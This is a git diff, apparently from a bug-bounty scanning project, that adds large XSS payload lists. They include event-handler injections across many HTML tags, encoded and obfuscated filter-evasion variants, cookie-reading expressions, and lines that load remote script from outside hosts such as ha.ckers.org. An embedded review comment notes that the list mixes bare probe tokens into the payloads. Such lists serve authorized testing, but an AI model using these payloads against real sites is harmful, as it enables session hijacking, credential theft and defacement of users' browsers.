id=x tabindex=1 onfocusin=alert(1)></tr> +<tr onbeforecopy="alert(1)" contenteditable>test</tr> +<tr onbeforecut="alert(1)" contenteditable>test</tr> +<tr onbeforepaste="alert(1)" contenteditable>test</tr> +<tr onblur=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onclick="alert(1)">test</tr> +<tr oncontextmenu="alert(1)">test</tr> +<tr oncopy="alert(1)" contenteditable>test</tr> +<tr oncut="alert(1)" contenteditable>test</tr> +<tr ondblclick="alert(1)">test</tr> +<tr onfocusout=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onkeydown="alert(1)" contenteditable>test</tr> +<tr onkeypress="alert(1)" contenteditable>test</tr> +<tr onkeyup="alert(1)" contenteditable>test</tr> +<tr onmousedown="alert(1)">test</tr> +<tr onmouseenter="alert(1)">test</tr> +<tr onmouseleave="alert(1)">test</tr> +<tr onmousemove="alert(1)">test</tr> +<tr onmouseout="alert(1)">test</tr> +<tr onmouseover="alert(1)">test</tr> +<tr onmouseup="alert(1)">test</tr> +<tr onpaste="alert(1)" contenteditable>test</tr> +<track draggable="true" ondrag="alert(1)">test</track> +<track draggable="true" ondragend="alert(1)">test</track> +<track draggable="true" ondragenter="alert(1)">test</track> +<track draggable="true" ondragleave="alert(1)">test</track> +<track draggable="true" ondragstart="alert(1)">test</track> +<track id=x tabindex=1 onactivate=alert(1)></track> +<track id=x tabindex=1 onbeforeactivate=alert(1)></track> +<track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus> +<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus> +<track id=x tabindex=1 onfocus=alert(1)></track> +<track id=x tabindex=1 onfocusin=alert(1)></track> +<track onbeforecopy="alert(1)" contenteditable>test</track> +<track onbeforecut="alert(1)" contenteditable>test</track> +<track onbeforepaste="alert(1)" contenteditable>test</track> +<track onblur=alert(1) tabindex=1 id=x></track><input autofocus> +<track onclick="alert(1)">test</track> +<track 
oncontextmenu="alert(1)">test</track> +<track oncopy="alert(1)" contenteditable>test</track> +<track oncut="alert(1)" contenteditable>test</track> +<track ondblclick="alert(1)">test</track> +<track onfocusout=alert(1) tabindex=1 id=x></track><input autofocus> +<track onkeydown="alert(1)" contenteditable>test</track> +<track onkeypress="alert(1)" contenteditable>test</track> +<track onkeyup="alert(1)" contenteditable>test</track> +<track onmousedown="alert(1)">test</track> +<track onmouseenter="alert(1)">test</track> +<track onmouseleave="alert(1)">test</track> +<track onmousemove="alert(1)">test</track> +<track onmouseout="alert(1)">test</track> +<track onmouseover="alert(1)">test</track> +<track onmouseup="alert(1)">test</track> +<track onpaste="alert(1)" contenteditable>test</track> +<tt draggable="true" ondrag="alert(1)">test</tt> +<tt draggable="true" ondragend="alert(1)">test</tt> +<tt draggable="true" ondragenter="alert(1)">test</tt> +<tt draggable="true" ondragleave="alert(1)">test</tt> +<tt draggable="true" ondragstart="alert(1)">test</tt> +<tt id=x tabindex=1 onactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus> +<tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus> +<tt id=x tabindex=1 onfocus=alert(1)></tt> +<tt id=x tabindex=1 onfocusin=alert(1)></tt> +<tt onbeforecopy="alert(1)" contenteditable>test</tt> +<tt onbeforecut="alert(1)" contenteditable>test</tt> +<tt onbeforepaste="alert(1)" contenteditable>test</tt> +<tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onclick="alert(1)">test</tt> +<tt oncontextmenu="alert(1)">test</tt> +<tt oncopy="alert(1)" contenteditable>test</tt> +<tt oncut="alert(1)" contenteditable>test</tt> +<tt ondblclick="alert(1)">test</tt> +<tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onkeydown="alert(1)" contenteditable>test</tt> +<tt onkeypress="alert(1)" contenteditable>test</tt> 
+<tt onkeyup="alert(1)" contenteditable>test</tt> +<tt onmousedown="alert(1)">test</tt> +<tt onmouseenter="alert(1)">test</tt> +<tt onmouseleave="alert(1)">test</tt> +<tt onmousemove="alert(1)">test</tt> +<tt onmouseout="alert(1)">test</tt> +<tt onmouseover="alert(1)">test</tt> +<tt onmouseup="alert(1)">test</tt> +<tt onpaste="alert(1)" contenteditable>test</tt> +<u draggable="true" ondrag="alert(1)">test</u> +<u draggable="true" ondragend="alert(1)">test</u> +<u draggable="true" ondragenter="alert(1)">test</u> +<u draggable="true" ondragleave="alert(1)">test</u> +<u draggable="true" ondragstart="alert(1)">test</u> +<u id=x tabindex=1 onactivate=alert(1)></u> +<u id=x tabindex=1 onbeforeactivate=alert(1)></u> +<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus> +<u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus> +<u id=x tabindex=1 onfocus=alert(1)></u> +<u id=x tabindex=1 onfocusin=alert(1)></u> +<u onbeforecopy="alert(1)" contenteditable>test</u> +<u onbeforecut="alert(1)" contenteditable>test</u> +<u onbeforepaste="alert(1)" contenteditable>test</u> +<u onblur=alert(1) tabindex=1 id=x></u><input autofocus> +<u onclick="alert(1)">test</u> +<u oncontextmenu="alert(1)">test</u> +<u oncopy="alert(1)" contenteditable>test</u> +<u oncut="alert(1)" contenteditable>test</u> +<u ondblclick="alert(1)">test</u> +<u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus> +<u onkeydown="alert(1)" contenteditable>test</u> +<u onkeypress="alert(1)" contenteditable>test</u> +<u onkeyup="alert(1)" contenteditable>test</u> +<u onmousedown="alert(1)">test</u> +<u onmouseenter="alert(1)">test</u> +<u onmouseleave="alert(1)">test</u> +<u onmousemove="alert(1)">test</u> +<u onmouseout="alert(1)">test</u> +<u onmouseover="alert(1)">test</u> +<u onmouseup="alert(1)">test</u> +<u onpaste="alert(1)" contenteditable>test</u> +<ul draggable="true" ondrag="alert(1)">test</ul> +<ul draggable="true" ondragend="alert(1)">test</ul> +<ul draggable="true" 
ondragenter="alert(1)">test</ul> +<ul draggable="true" ondragleave="alert(1)">test</ul> +<ul draggable="true" ondragstart="alert(1)">test</ul> +<ul id=x tabindex=1 onactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus> +<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus> +<ul id=x tabindex=1 onfocus=alert(1)></ul> +<ul id=x tabindex=1 onfocusin=alert(1)></ul> +<ul onbeforecopy="alert(1)" contenteditable>test</ul> +<ul onbeforecut="alert(1)" contenteditable>test</ul> +<ul onbeforepaste="alert(1)" contenteditable>test</ul> +<ul onblur=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onclick="alert(1)">test</ul> +<ul oncontextmenu="alert(1)">test</ul> +<ul oncopy="alert(1)" contenteditable>test</ul> +<ul oncut="alert(1)" contenteditable>test</ul> +<ul ondblclick="alert(1)">test</ul> +<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onkeydown="alert(1)" contenteditable>test</ul> +<ul onkeypress="alert(1)" contenteditable>test</ul> +<ul onkeyup="alert(1)" contenteditable>test</ul> +<ul onmousedown="alert(1)">test</ul> +<ul onmouseenter="alert(1)">test</ul> +<ul onmouseleave="alert(1)">test</ul> +<ul onmousemove="alert(1)">test</ul> +<ul onmouseout="alert(1)">test</ul> +<ul onmouseover="alert(1)">test</ul> +<ul onmouseup="alert(1)">test</ul> +<ul onpaste="alert(1)" contenteditable>test</ul> +<var draggable="true" ondrag="alert(1)">test</var> +<var draggable="true" ondragend="alert(1)">test</var> +<var draggable="true" ondragenter="alert(1)">test</var> +<var draggable="true" ondragleave="alert(1)">test</var> +<var draggable="true" ondragstart="alert(1)">test</var> +<var id=x tabindex=1 onactivate=alert(1)></var> +<var id=x tabindex=1 onbeforeactivate=alert(1)></var> +<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus> +<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus> +<var id=x tabindex=1 
onfocus=alert(1)></var> +<var id=x tabindex=1 onfocusin=alert(1)></var> +<var onbeforecopy="alert(1)" contenteditable>test</var> +<var onbeforecut="alert(1)" contenteditable>test</var> +<var onbeforepaste="alert(1)" contenteditable>test</var> +<var onblur=alert(1) tabindex=1 id=x></var><input autofocus> +<var onclick="alert(1)">test</var> +<var oncontextmenu="alert(1)">test</var> +<var oncopy="alert(1)" contenteditable>test</var> +<var oncut="alert(1)" contenteditable>test</var> +<var ondblclick="alert(1)">test</var> +<var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus> +<var onkeydown="alert(1)" contenteditable>test</var> +<var onkeypress="alert(1)" contenteditable>test</var> +<var onkeyup="alert(1)" contenteditable>test</var> +<var onmousedown="alert(1)">test</var> +<var onmouseenter="alert(1)">test</var> +<var onmouseleave="alert(1)">test</var> +<var onmousemove="alert(1)">test</var> +<var onmouseout="alert(1)">test</var> +<var onmouseover="alert(1)">test</var> +<var onmouseup="alert(1)">test</var> +<var onpaste="alert(1)" contenteditable>test</var> +<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeked=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay 
ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video draggable="true" ondrag="alert(1)">test</video> +<video draggable="true" ondragend="alert(1)">test</video> +<video draggable="true" ondragenter="alert(1)">test</video> +<video draggable="true" ondragleave="alert(1)">test</video> +<video draggable="true" ondragstart="alert(1)">test</video> +<video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x controls onfocusin=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x tabindex=1 onactivate=alert(1)></video> +<video id=x tabindex=1 onbeforeactivate=alert(1)></video> +<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus> +<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus> +<video onbeforecopy="alert(1)" contenteditable>test</video> +<video onbeforecut="alert(1)" contenteditable>test</video> +<video onbeforepaste="alert(1)" contenteditable>test</video> +<video onblur=alert(1) tabindex=1 id=x></video><input autofocus> +<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onclick="alert(1)">test</video> +<video oncontextmenu="alert(1)">test</video> +<video oncopy="alert(1)" contenteditable>test</video> +<video oncut="alert(1)" contenteditable>test</video> +<video ondblclick="alert(1)">test</video> +<video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus> +<video onkeydown="alert(1)" contenteditable>test</video> +<video onkeypress="alert(1)" contenteditable>test</video> +<video onkeyup="alert(1)" contenteditable>test</video> +<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onmousedown="alert(1)">test</video> +<video onmouseenter="alert(1)">test</video> +<video onmouseleave="alert(1)">test</video> +<video onmousemove="alert(1)">test</video> +<video 
onmouseout="alert(1)">test</video> +<video onmouseover="alert(1)">test</video> +<video onmouseup="alert(1)">test</video> +<video onpaste="alert(1)" contenteditable>test</video> +<video src/onerror=alert(1)> +<video><source onerror=alert(1) src=1></video> +<video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video> +<wbr draggable="true" ondrag="alert(1)">test</wbr> +<wbr draggable="true" ondragend="alert(1)">test</wbr> +<wbr draggable="true" ondragenter="alert(1)">test</wbr> +<wbr draggable="true" ondragleave="alert(1)">test</wbr> +<wbr draggable="true" ondragstart="alert(1)">test</wbr> +<wbr id=x tabindex=1 onactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus> +<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus> +<wbr id=x tabindex=1 onfocus=alert(1)></wbr> +<wbr id=x tabindex=1 onfocusin=alert(1)></wbr> +<wbr onbeforecopy="alert(1)" contenteditable>test</wbr> +<wbr onbeforecut="alert(1)" contenteditable>test</wbr> +<wbr onbeforepaste="alert(1)" contenteditable>test</wbr> +<wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onclick="alert(1)">test</wbr> +<wbr oncontextmenu="alert(1)">test</wbr> +<wbr oncopy="alert(1)" contenteditable>test</wbr> +<wbr oncut="alert(1)" contenteditable>test</wbr> +<wbr ondblclick="alert(1)">test</wbr> +<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onkeydown="alert(1)" contenteditable>test</wbr> +<wbr onkeypress="alert(1)" contenteditable>test</wbr> +<wbr onkeyup="alert(1)" contenteditable>test</wbr> +<wbr onmousedown="alert(1)">test</wbr> +<wbr onmouseenter="alert(1)">test</wbr> +<wbr onmouseleave="alert(1)">test</wbr> +<wbr onmousemove="alert(1)">test</wbr> +<wbr onmouseout="alert(1)">test</wbr> +<wbr onmouseover="alert(1)">test</wbr> +<wbr onmouseup="alert(1)">test</wbr> +<wbr onpaste="alert(1)" contenteditable>test</wbr> +<xmp draggable="true" 
ondrag="alert(1)">test</xmp> +<xmp draggable="true" ondragend="alert(1)">test</xmp> +<xmp draggable="true" ondragenter="alert(1)">test</xmp> +<xmp draggable="true" ondragleave="alert(1)">test</xmp> +<xmp draggable="true" ondragstart="alert(1)">test</xmp> +<xmp id=x tabindex=1 onactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus> +<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus> +<xmp id=x tabindex=1 onfocus=alert(1)></xmp> +<xmp id=x tabindex=1 onfocusin=alert(1)></xmp> +<xmp onbeforecopy="alert(1)" contenteditable>test</xmp> +<xmp onbeforecut="alert(1)" contenteditable>test</xmp> +<xmp onbeforepaste="alert(1)" contenteditable>test</xmp> +<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onclick="alert(1)">test</xmp> +<xmp oncontextmenu="alert(1)">test</xmp> +<xmp oncopy="alert(1)" contenteditable>test</xmp> +<xmp oncut="alert(1)" contenteditable>test</xmp> +<xmp ondblclick="alert(1)">test</xmp> +<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onkeydown="alert(1)" contenteditable>test</xmp> +<xmp onkeypress="alert(1)" contenteditable>test</xmp> +<xmp onkeyup="alert(1)" contenteditable>test</xmp> +<xmp onmousedown="alert(1)">test</xmp> +<xmp onmouseenter="alert(1)">test</xmp> +<xmp onmouseleave="alert(1)">test</xmp> +<xmp onmousemove="alert(1)">test</xmp> +<xmp onmouseout="alert(1)">test</xmp> +<xmp onmouseover="alert(1)">test</xmp> +<xmp onmouseup="alert(1)">test</xmp> +<xmp onpaste="alert(1)" contenteditable>test</xmp> +<xss id=x tabindex=1 onactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onfocus=alert(1)></xss> +<xss id=x tabindex=1 
onfocusin=alert(1)></xss>
+<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus>
\ No newline at end of file
diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-evation.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-evation.txt
new file mode 100644
index 0000000..6411021
--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-evation.txt
@@ -0,0 +1,164 @@ +"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script> +"'><script>alert('XSS')</script> +"'><script>alert(/XSS/)</script> +"'><script>alert(42)</script> +"'><script>prompt(42)</script> +"'><script>confirm(42)</script> +"'><sCriPt>confirm(42)</sCriPt> +"'><script >confirm(42)</script > +"'><script foo=bar>confirm(42)</script> +"'><\script>confirm(42)</script> +"'><sc\ript>confirm(42)</script> +"'><sc\tript>confirm(42)</script> +"'><script onlyOpera:-)>alert(42) +"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/ +"'><script x:href='//evil.com/onlyOpera'> +"'><///script///>alert(42)</script> +"'><///style///>alert(42)</script> +"'><;(24)trela=daolno ;''=e>'=d +"'><;(24)trela=daolno ;''=/e>'=d +"'><isindex action="javas&Tab;cript:alert(42)" type=image> +"'><sc ript>confirm(42)</script> +"'%3e%3cscript%3econfirm(42)%3c/script%3e +"'%253e%253cscript%253econfirm(42)%253c/script%253e +"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +%22%27%3e%3cscript%3econfirm(42)%3c/script%3e +%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e +%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e +%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +"'><script>\u0061lert(42)</script> +"'ܾܼscriptܾalert(42)ܼܯscriptܾ +"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e 
+"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +javascript:alert(42) +javascript:prompt(42) +javascript:confirm(42) +jAvasCript:confirm(42) +jAvas\Cript:confirm(42) +jAvas Cript:confirm(42) +jAvas/* */Cript:confirm(42) + javascript:alert(42) +document +document. +top +top. +top[ +eval +eval( +cookie +.cookie +onerror +onerror= +onclick +onclick= +onmouseover +onmouseover= +onload +onload= +"onerror +"onerror= +"onclick +"onclick= +"onmouseover +"onmouseover= +"onload +"onload= +href= +src= +link= +style= +alt= +title= +egal= +"href= +"src= +"link= +"style= +"alt= +"title= +"egal= +<a +<a href= +<a alt=42 href= +<a href="javascript: +<a href=" javascript: +<p +<div +<iframe +<index +<layer +<link +<meta +<style +<script +<img src="/" =_=" title="onerror='alert(42)'"> +<img src ?notinChrome?\/onerror = alert(42) +<img src ?notinChrome?\/onerror=alert(42) +<img/alt="/"src="/"onerror=alert(42)> +<iframe/src \/\/onload = alert(42) +<iframe/onreadystatechange=alert(42) +<!-- open comment +<!-- complete comment --> +--><!-- close/complete comment --> +<![CDATA[ +<![CDATA[ open cdata +<![CDATA[ complete cdata ]]> +]]><![CDATA[ close/complete cdata ]]> +<?xml +<?xml version="1.0"> +" value=`` +onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS') +onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450 +<div style="{ left:expression( alert('XSS') ) }"> +left:expr/**/ession(alert('XSS')) +left:expr/* */ession(alert('XSS')) +left:e\0078pr\0065ssion(alert('XSS')) +left:\0065\0078pr\0065ssion(alert('XSS')) +left:expr\65ssion(alert('XSS') )) +left:expr\0065ssion(alert('XSS')) +left:expr&#x65;ssion(alert('XSS')) +left:expr&#101;ssion(alert('XSS')) +left:expr&#x0065;ssion(alert('XSS')) +left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS')) 
+left:&#xff45;&#xff58;&#xff50;&#xff52;&#xff45;&#xff53;&#xff53;&#xff49;&#xff4f;&#xff4e;(alert('XSS')) +left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450 +left:expression(alert('XSS')) +left:EXPR/**/ESSION(alert('XSS')) +left:EXPR/* */ESSION(alert('XSS')) +left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS')) +left:&#xff25;&#xff38;&#xff30;&#xff32;&#xff42;&#xff53;&#xff33;&#xff29;&#xff2f;&#xff2e;(alert('XSS')) +left:EXPRESSION(alert('XSS')) +left:exp\0280essio\0274(alert('XSS')) +left:exp\0280essio\207f(alert('XSS')) +left:expʀessioɴ(alert('XSS')) +left:expʀessioⁿ(alert('XSS')) +%u00ABscript%u00BB +&#x3008;script&#x3009; +U%2bFF1CscriptU%2bFF1E +&#x2039;script&#x203A; +&#x2329;script&#x232A; +&#x27E8;script&#x27E9; +href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded +href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all) +href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64 +href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7 +href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all) +href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix +href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64 +href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64 +href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7 +%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e 
+%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e +<%<!--'%><script>alert(42);</script --> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-h4k.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-h4k.txt new file mode 100644 index 0000000..e78a94c --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-h4k.txt 
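Review bot: This list mixes complete payloads with bare probe tokens (`document`, `top`, `eval(`, `onerror=`, `<a`, `<p`) and with entries that carry a trailing human label, such as the `href="data:..."` lines ending in `base64`, `UTF-7 (all)` or `">obfuscated UTF-7 in base64`. The loader is not visible in this hunk, but if it treats each line as one payload and confirms a hit by finding the string reflected, a page that merely echoes `top` or `title=` would be reported as XSS, and the label text would be sent as part of the value. I would move the bare tokens into a separate filter-probe list that is never scored as a finding, and strip the labels or put them behind a comment marker the loader skips.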
@@ -0,0 +1,206 @@ +onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} +aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" +<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&> +<div&nbsp;style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +<div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)> +<BASE HREF="javascript:alert('XSS');//"> +`> <script>alert(5)</script> +> <script>alert(4)</script> +xyz onerror=alert(6); +1;a=eval;b=alert;a(b(/c/.source)); +1];a=eval;b=alert;a(b(17));// +];a=eval;b=alert;a(b(16));// +'];a=eval;b=alert;a(b(15));// +1};a=eval;b=alert;a(b(14));// +'};a=eval;b=alert;a(b(13));// +};a=eval;b=alert;a(b(12));// +a=1;a=eval;b=alert;a(b(11));// +;//%0da=eval;b=alert;a(b(10));// +';//%0da=eval;b=alert;a(b(9));// +'> <script>alert(3)</script> +</title><script>alert(1)</script> +<BGSOUND SRC="javascript:alert('XSS');"> +<BODY 
BACKGROUND="javascript:alert('XSS');"> +<BODY ONLOAD=alert('XSS')> +<!--<A href="- --><a href=javascript:alert:document.domain>test--> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C +<script>var a = "</script> <script> alert('XSS !'); </script> <script>";</script> +<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +*/a=eval;b=alert;a(b(/e/.source));/* +width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) +<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<IFRAME SRC=http://ha.ckers.org/scriptlet.html < +<A HREF="http://1113982867/">XSS</A> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS');"> +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +\";alert('XSS');// +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a="blah" 